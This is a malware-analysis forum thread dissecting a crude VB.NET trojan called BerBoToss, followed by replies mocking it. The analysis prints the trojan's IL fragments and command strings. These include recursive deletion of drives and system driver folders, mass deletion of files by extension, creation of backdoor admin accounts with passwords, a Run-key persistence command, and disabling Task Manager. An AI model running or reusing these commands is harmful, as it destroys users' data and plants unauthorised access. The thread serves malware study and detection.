[STRELiTZIA]

Hi,
It is a Windows PE EXE file. It is written in vb.net
This Trojan performs several malicious actions, destroying and altering data with malicious intent, causing computer malfunction, displaying informative message and logout system with creating new protected user’s sessions. This malware sample has very basic infection ways and aggressive behavior to delete specific files.

Filename: BerBoToss.exe
Language: MS Visual Basic.NET

Author according version information:
3an9oud-La3jeb Hackers
Maroc Fes City BerBoToss

Session name: 3an9oud-La3jeb
Password: 1MarocBerbotossFes
Session name: Berbotoss_L39
Password: 1MarocBerbotossFes
Session name: Fes_L39_Berbotoss
Password: 1MarocBerbotossFes
Session name: Administrateur
Password: 1marocberbotossfes <<-- "lower case"

Disable Task Manager:
.method public static void DisableTaskMgr(bool Enable)
.locals init (bool V0)
switch DisableTaskMgr_0, DisableTaskMgr_1

DisableTaskMgr_1:
call class BerBoToss.My.MyComputer BerBoToss.My.MyProject::get_Computer()
callvirt get_Registry()
ldstr "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\system"
ldstr "DisableTaskMgr"
ldstr "1"
callvirt SetValue

DisableTaskMgr_0:
call class BerBoToss.My.MyComputer BerBoToss.My.MyProject::get_Computer()
callvirt get_Registry()
ldstr "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\system"
ldstr "DisableTaskMgr"
callvirt SetValue

Create text files:
ldstr "C:\\wmnpdmod.dll"
ldstr "BeRboToss-BeRboToss-BeRboToss-BeRboToss-BeRboToss"
ldstr "C:\\msimg32.dll"
ldstr "BeRboToss-BeRboToss-BeRboToss-BeRboToss-BeRboToss"
ldstr "C:\\kbdhe340.dll"
ldstr "BeRboToss-BeRboToss-BeRboToss-BeRboToss-BeRboToss"

Kill process:
ldstr "firefox"
callvirt void [System]System.Diagnostics.Process::Kill()
ldstr "IEXPLORE"
callvirt void [System]System.Diagnostics.Process::Kill()
ldstr "notepad"
callvirt void [System]System.Diagnostics.Process::Kill()
ldstr "msnmsgr"
callvirt void [System]System.Diagnostics.Process::Kill()

Copy itself:
ldstr "cmd /c copy BerBoToss.exe C:\\BerBoToss.exe"
ldstr "cmd /c copy BerBoToss.exe E:\\BerBoToss.exe"
ldstr "cmd /c copy BerBoToss.exe F:\\BerBoToss.exe"
ldstr "cmd /c copy BerBoToss.exe D:\\BerBoToss.exe"
ldstr "cmd /c copy BerBoToss.exe g:\\BerBoToss.exe"
ldstr "cmd /c copy BerBoToss.exe C:\\WINDOWS\\BerBoToss.exe"

Create new user session:
ldstr "net user Administrateur /add"
ldstr "net user Fes_L39_Berbotoss /add"
ldstr "net user 3an9oud-La3jeb /add"
ldstr "net user Berbotoss_L39 /add"
ldstr "net user Fes_L39_Berbotoss 1MarocBerbotossFes"
ldstr "net user 3an9oud-La3jeb 1MarocBerbotossFes"
ldstr "net user Administrateur 1marocberbotossfes"
ldstr "net user Berbotoss_L39 1MarocBerbotossFes"

Rename hard disk label:
ldstr "label c: 3an9oud-La3jeb"
ldstr "label d: 3an9oud-La3jeb"
ldstr "label e: 3an9oud-La3jeb"
ldstr "label f: 3an9oud-La3jeb"
ldstr "label g: 3an9oud-La3jeb"
ldstr "label h: 3an9oud-La3jeb"
ldstr "label l: 3an9oud-La3jeb"

Delete NET session:
ldstr "cmd /c NET SESSION * /del"
ldstr "cmd /c NET SESSION \\poste_connect? /del"

Remove directory:
ldstr "cmd /c rd d:\\ /s/q"
ldstr "cmd /c rd e:\\ /s/q"
ldstr "cmd /c rd f:\\ /s/q"
ldstr "cmd /c rd g:\\ /s/q"
ldstr "cmd /c rd C:\\WINDOWS\\system32\\drivers /s/q"

Delete specific files:
ldstr "cmd /c del C:\\*.mp3 /s/q"
ldstr "cmd /c del C:\\*.jpg /s/q"
ldstr "cmd /c del C:\\*.zip /s/q"
ldstr "cmd /c del C:\\*.rar /s/q"
ldstr "cmd /c del C:\\*.lnk /s/q"
ldstr "cmd /c del C:\\*.3gp /s/q"
ldstr "cmd /c del C:\\*.lrc /s/q"
ldstr "cmd /c del C:\\*.html /s/q"

Set new system time:
ldstr "cmd /c Time 11:11.00"

Set new system date:
ldstr "cmd /c date 01/1/1987"

Lock workstation:
ldstr "cmd /c rundll32.exe user32.dll,LockWorkStation"

Start default Internet Explorer:
ldstr "hxxp://fassifasso.tripod.com/xxx.xxx/BerBoToss/index.html"
call class [System]System.Diagnostics.Process [System]System.Diagnostics.Process::Start(class System.String)

Set malware startup:
ldstr "cmd /c reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v BerBoToss /t REG_SZ /d C:\\WINDOWS\\BerBoToss.exe"

Clipboard:
callvirt class MyServices.ClipboardProxy Devices.Computer::get_Clipboard()
ldstr "BerBoToss V1.0"

Display message:
ldstr "BerBoToss Operation !!! Chinass Hakda Kayfahmo Chinass Hakda kayssam3o Hada Message lik Ou Lihoum _+... Daba AdiosS Amigoss"
ldstr "Maroc Fes Erreur HTTA 39 - Mardankore.dll ... & "
call value class MsgBoxResult Interaction::MsgBox(class System.Object, value class MsgBoxStyle, class System.Object)
box MsgBoxResult

Last sample 1/41 VT Scan
http://www.virustotal.com/fr/analisis/d ... 1279046904

[Elite]

Script kiddie shit.

[STRELiTZIA]

Script kiddie shit.

Exactly what I said in our forum -AT4RE- and Malware authors become crazy and insulted me :mrgreen:

[wealllbe20]

Everybody here could create a better piece of crap in batch and just use a free batch compiler.

[EP_X0FF]

One of the most ridiculous trojans I've ever seen :D Number two, after 260 Mb size trojan with pr0n video inside.